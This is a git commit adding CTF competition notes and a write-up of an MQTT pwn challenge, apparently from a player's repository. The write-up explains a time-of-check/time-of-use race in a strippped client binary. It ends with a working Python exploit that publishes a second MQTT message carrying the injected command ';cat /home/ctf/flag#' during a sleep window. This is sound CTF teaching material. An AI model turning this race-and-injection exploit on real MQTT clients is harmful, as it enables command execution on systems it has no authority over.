ciscnxccb2025: add final day 1

RocketMaDev · RocketMaDev · commit 90430ce0e136 · 2025-07-19T23:30:06.000+08:00
diff --git a/ciscnxccb2025/README.md b/ciscnxccb2025/README.md
@@ -18,3 +18,19 @@
 我们队上半场awdp排名22，下半场渗透排名12，最终排名14，成功进军长城杯和国赛的决赛。
 
 [半决赛博客](https://rocketma.dev/2025/03/19/semifinal/)
+
+## 长城杯决赛
+
+经典爆0了，最后排名28，保底三等奖了。protobuf忘记准备了，明明之前刚遇到过，
+甚至我都已经star了解析message结构体的仓库了，结果忘记了，这下吃一堑吃一堑了
+
+1. orw
+2. interpreter
+3. tiny_console
+4. ccb-dev
+
+## 国赛决赛
+
+第一天只做了一个`easy_can`，`mqtt`那里就是没想到有个条件竞争，这么简单的题，太遗憾了
+
+1. [mqtt](final.mqtt.md)
diff --git a/ciscnxccb2025/assets/sleep2.png b/ciscnxccb2025/assets/sleep2.png
diff --git a/ciscnxccb2025/final.mqtt.md b/ciscnxccb2025/final.mqtt.md
@@ -0,0 +1,86 @@
+# mqtt
+
+> 某车企新来的实习生想要给汽车上的MQTT客户端加强一下性能，却没想到弄巧成拙，
+> 你能试着攻破客户端吗？
+
+## 文件属性
+
+|属性  |值    |
+|------|------|
+|Arch  |amd64 |
+|RELRO |Full  |
+|Canary|on    |
+|NX    |on    |
+|PIE   |on    |
+|strip |yes   |
+
+## 解题思路
+
+第一次做mqtt的题，一开始依赖都没有，还好国赛有上网区，趁10分钟的机会把依赖下一下。
+
+题目附件中并没有给出broker的信息，因此broker大概不是考点，
+我们可以直接借助`python-paho`这样的库来操作题目。
+
+> [!IMPORTANT]
+> 在做题之前，首先要知道mqtt的工作原理，mqtt中存在中心代理broker，负责接受并广播消息，
+> 客户端使用subscribe来“监听”某个指定的主题，然后使用publish将消息广播到所有订阅了该主题的客户端上。
+> 对于这道题，我们不需要也不能和目标二进制直接建立连接，只能用mqtt机制去打。
+
+虽然剥了符号，但是并不难，整体逆向量很小，唯一需要注意的代码就在这里：
+
+<img src="assets/sleep2.png" width="80%">
+
+在处理每条消息的时候，都会开一条新的线程，这意味着存在着临界资源；
+在处理`set_vin`指令时，check后等待了2秒再继续运行命令，这意味着临界资源能被其他线程修改；
+在check和运行命令时都从全局变量中获取内容，没有先复制到栈上；
+摆明了就是条件竞争，先运行正确的`set_vin`指令，然后在sleep过程中，
+再publish一条消息把`arg`修改掉，就可以成功注入命令了。
+
+我就说怎么这么多人做出来呢，原来是这么简单的条件竞争，还是条件竞争做少了，
+下次要有看到sleep就想到条件竞争的敏锐感。
+
+## EXPLOIT
+
+```python
+import paho.mqtt.client as mqtt
+import time
+from json import dumps
+
+broker = '39.96.190.95'
+client_id = "python_client"
+vin = 'XDGV56EK1R8B3W42B'
+hashn = 0
+for ch in vin:
+    hashn = hashn * 0x1f + ord(ch)
+auth = hex(hashn)[-8:]
+
+def on_connect(client, userdata, flags, rc):
+    print(f"Connected with result code {rc}")
+    client.subscribe("diag")
+
+def on_message(client, userdata, msg):
+    print(f"{msg.topic}: {msg.payload.decode()}")
+
+client = mqtt.Client(client_id)
+client.on_connect = on_connect
+client.on_message = on_message
+client.connect(broker, 36985, 60)
+cmd = {
+    'auth': auth,
+    'cmd': 'set_vin',
+    'arg': '123456789',
+}
+client.loop_start()
+client.publish('diag', dumps(cmd))
+time.sleep(0.5)
+cmd['arg'] = ';cat /home/ctf/flag#'
+client.publish('diag', dumps(cmd))
+client.subscribe('diag/resp')
+try:
+    while True:
+        time.sleep(0.5)
+except KeyboardInterrupt:
+    pass
+client.loop_stop()
+client.disconnect()
+```
